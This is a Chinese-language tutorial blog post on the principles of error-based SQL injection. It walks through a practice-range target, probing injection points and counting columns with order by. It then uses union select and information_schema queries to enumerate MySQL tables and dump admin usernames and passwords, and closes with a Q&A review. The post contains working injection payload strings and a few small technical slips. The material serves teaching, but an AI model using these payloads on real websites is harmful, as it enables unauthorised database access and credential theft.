SQL注入的原理分析

最新推荐文章于 2025-11-06 09:12:02 发布

原创最新推荐文章于 2025-11-06 09:12:02 发布 · 1k 阅读

15 ·

CC 4.0 BY-SA版权

文章标签：

#sql #数据库 #php #开发语言 #web安全 #网络安全 #安全

SQL注入基础专栏收录该内容

1 篇文章

订阅专栏

本文详细探讨了SQL注入的原理，包括用户可控输入导致的代码执行，以及如何通过显错注入进行联合查询、判断显示位和数据库内容。讲解了orderby、unionselect、limit等技术在注入检测中的应用。

一、SQL注入本质

注入攻击的本质，是把用户输入的数据当做代码执行。

这里有两个关键条件：

第一个是用户能够控制输入

第二个是原本程序要执行的代码，拼接了用户输入的数据然后进行执行

显错注入靶场的做法:

判断注入点

最古老的方法： and 1=1 页面正常 and 1=2 页面不正常

最简单的方法：页面后面加',看是否报错 ' and 1=1# ('把前面的语句给闭合，#把后面的语句给省略掉，只留中间的语句执行)

的方法：如果是数字型传参，可以尝试-1

例如： http://www.xxx.com/new.php?id=1 页面显示id=1的新闻 http://www.xxx.com/new.php?id=2-1 页面显示id=1的新闻

and 1=1 and 1=2 被拦截的可能性太高了可以尝试 and -1=-1 and -1=-2 and 1>0 or 1=1 或者直接 or sleep(5)

二、分析显错注入

显错注入-联合查询（Mysql数据库）的基本流程

新知识点：通过系统自带库查询数据

Mysql在5.0以上版本加入了 information_schema 这个系统自带库其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等

information_schema.tables 存放表名和库名的对应

information_schema.columns 存放字段名和表名的对应

[注: information_schema.tables 实际上是选中information_schema库中的tables表]

可以通过查询数据来确定系统自带表

（在前提已经知道输出点是2的情况下） id=1.1 union select 1,table_name from information_schema.tables where table_schema=maoshe/database() 就能得到表，在后面加limit 1,1 2,1 3,1 4,1最终找到admin表

然后找字段，select 1,column_name from information_schema.columns where table_name=’admin’找到字段id.在后面加上limit1,1 2,1,3,1等找到password,username等字段，

解析：and 1=1 正常 and1=2不正常，说明添加的语句被执行了，说明存在sql注入

或者在id后输入id=2-1后显示的是id=1的内容，也说明存在注入，因为数据库进行了运算

有时候1=1容易被拦截，可以变成-1=-1，1>100，也可以用or,但or要求前后只要有一个正确就行，所以要把前面的id改成不存在的，如id=1.1 or 1=1显示正常说明存在sql注入

或者id=1.1 or sleep(5)

但在news表里是找不到想要的管理员密码的，所以需要用到联合查询：将两个语句查询到的数据输出在一起。但联合查询的前提要求是字段数必须相同，这要求知道当前表的字段数，需要用到order by 排序，如果只有四个字段，order by 5是没法排序的，会报错就是会显示一些不一样的，

Select 1,2 union select 4,5 则会先输出 1 2 再输出4 5 。这是因为联合查询默认将前面语句得出的结果放在前面输出，

Union select 1,2 表示会输出数字1，2，但页面并没显示1，2

    url栏中+的意义是空格，所以不能1+1来用，用+的话需要先用url编码转化。
    在判断可以注入之后，就开始判断表的字段数了，通过查看源代码可以得知"SELECT * FROM `news` WHERE `id`=".$_REQUEST["id"].";")
    可以得知当前是在news表中查询，在原网址后输入 order by 1没反应，order by 2 没反应 order by 3 时页面出现问题，这说明news表中的字段数为2
    Union 联和语句，前后sql语句列数必须相同，这样就能知道后面的语句可以用几个字段，于是在原网址后输入 union select 1,2 页面没问题，加个，3就变了，实际上，数据库输出的都是有意义的， 
    在实际中，联合查询前面的语句显示在第一行，后面的语句显示在第二行，而sql语句一般只显示第一行，所以如何显示联合查询的后面语句呢？第一个方法是，让前面的语句出错，在前面的语句后加入and 1 = 2,或者把前面的id=1 改成  id =1.111 因为id都是正整数 这样网址页面就只会显示后面的语句了。第二种方法是，通过limit排序，limit是mysql特有语句，limit 0,1 [从第一行数据取一个] limit 1,1 [从第二行数据取一个] ，在后面语句加入limit 1,2就行
    这样就能找到2为输出点 ….and 1 = 2 union select 1,2 from admin 然后修改为….and 1 = 2 union select 1,passwordfrom admin这样页面就能显示密码。但如果不知道输出点是2，变成…and 1 = 2 union select password,2 from admin 是不会出现密码的、
    接着，在查询数据库时，要知道库名，表名，字段名，先查询库名 ….id = 1 union select 1,database() limit 1,1
    其中database() 是用来查询当前库名，页面显示库名为maoshe 接下来是表名，mysql5.0以上版本会自带系统自带库 information_schema 这里面储存的有两张表。一个是tables表，里面存着所有表和库的关系，语句为select*from information_schema.tables where table_schema='maoshe' 一般数据库里不只两个字段，但  此次只能有两个字段，因此需要只输出Table表 …id= 1 union select 1,table_name from information_schema.tables where table_schema='maoshe' limit 1,1
    显示为 admin表。把limit 1.1 改成 limit 2,1 输出为dirs表 limit 3,1 输出为 news 就这样一行一行输出 如果嫌麻烦 可以用group_concat() 作用是将多行数据合并一行输出，以逗号分隔。id=9.99 union select 1,group_concat()table_name from information_schema.tables where table_schema='maoshe' 就可以全部输出，缺陷是有七八十条数据，长度限制，禁用等等
    接下来是字段名，有一个表叫columns.里面都是字段名，…id=9.99 union select 1，column _name from information_schema.columns where table_schema='maoshe' and table_name='admin' 其中admin一般代表密码，输出显示为id 然后在后面加 limit 1,1 出现username limit 2,1 出现 password 由此可以得知至少有三个字段，id(没啥用),username（用户名）,password（密码） 这样的话 …id=9.99 union select 1，password  from admin 即可显示密码

三、显错注入的做法

判断当前页面字段总数

• and 1=1 order by 1,2,3,4,5……

判断显示位

• and 1=2 union select 1,2,3,4,5,6,7……

查当前数据库

• and 1=2 union select 1,2,database()

查表名

• and 1=2 union select 1,2,table_name from information_schema.tables where TABLE_SCHEMA=数据库名 limit 0,1

查列名

• and 1=2 Union select 1,2,columns_name from information_schema.COLUMNS where TABLE_NAME=表名 limit 0,1

查字段内容

• and 1=2 union select 1,用户名段,密码段 from 表名 limit 0,1

• 介绍一个函数：GROUP_CONCAT 将多行数据进行整合在一行输出

Limit 0,1 指的是从第一行数据取1行

Mysql低于5.0就只能爆破了

1.sql注入本质是什么

把用户输入当做代码执行

2.sql注入的条件

用户可控输入和原本程序要执行代码，拼接用户输入且当作SQL语句去执行

3.order by的作用及含义

order by 用于判断显示位，order by 原有的作用是对字段进行一个排序，在sql注入中用order by 来判断排序，order by 1就是对一个字段进行排序，如果一共四个字段，你order by 5 数据库不知道怎么排序，于是乎就错误了无返回值

4.union select如何发挥作用

union为联合查询，a联合b进行了查询，为查询了前面的sql语句(原有的)后再进行后面的sq查询(我们添加的)，但两张表联合查询的字段数必须相同。

5.输出位是什么

SQL查询出来的数据不一定全部会输出，页面上只会输出几个字段的信息，那几个会输出的字段就是输出位

6.information_schema是什么

information_schema是mysql的系统自带表，用于查询数据，在mysql5.0以上版本中存在

7.加单引号和加 and 1=2有什么区别

有区别，单引号是为了闭合语句，而and 1=2是为了让union前面的语句无查询结果无输出，然后直接输出拼接进去union后面的那个语句的查询结果

8.and 是什么意思

and 为和的意思，一个语句中，当前一个正确，后一个错误时，如果是and连接整个语句返回是False

9.or是什么意思

Or 为和的意思，一个语句中，当前一个正确，后一个错误时，如果是or连接整个语句返回是True

10.and 和 or 选择使用有什么讲究？

And 语句执行时，如果and 前的语句返回False,那么and后面的语句根本不执行

11.除了单引号外还有其他的符号可以闭合吗？

实际上还是要看源码，常见的是单引号和双引号还有括号

12.limit的作用

limit 在注入中用于排序然后输出，limit a,b a代表了从哪个位置(从0开始) b代表从那位开始显示几条数据

13.可以查讯多个字段内容吗

可以，可以使用语句Group_concat()函数进行输出

14.%23有什么作用

%23编码为#,用于注释后面的语句,防止SQL注入点后原本的SQL语句对SQL注入进行干扰

15.报错注入的原理

利用sql注入拼接sql语句，将报错信息输出时同时将我们想要的信息输出

16.闭合是什么

在sql查询中，代码比较严谨，括号和引号都得成双成对，引号内的默认是字符串不会当作SQL语句执行，所以必须闭合然后才能注入，当然有些SQL语句直接拼接，也就不用什么闭合了

17.SQL注入有数据库限制吗？

没有，常见的数据库都可以

18.SQL注入有动态脚本语言限制吗？

没有限制

19.SQL注入如果没系统自带表怎么办

只能通过猜，不断的尝试，一般而言数据库的表也不会乱起名字

20.系统自带库管理员不会修改吗？

一般而言并不会

21.union all 和 union 区别

如果输出的数据有相同的，Union只会输出一次，而union all都会输出

22.为什么用and 1=1正常 and 1=2报错来判断是否存在SQL注入

因为如果存在SQL注入，那么and就是和的意思，1=1是一个恒等式，然后因为原本能够查出数据，那么两个真就是True，但是1=2肯定是不可能的，这里就会返回一个False,然后因为和必须两个真才返回True,所以这里拼接就不成立返回False.

诚邀有兴趣的师傅一起来加入网安大家庭：safe2082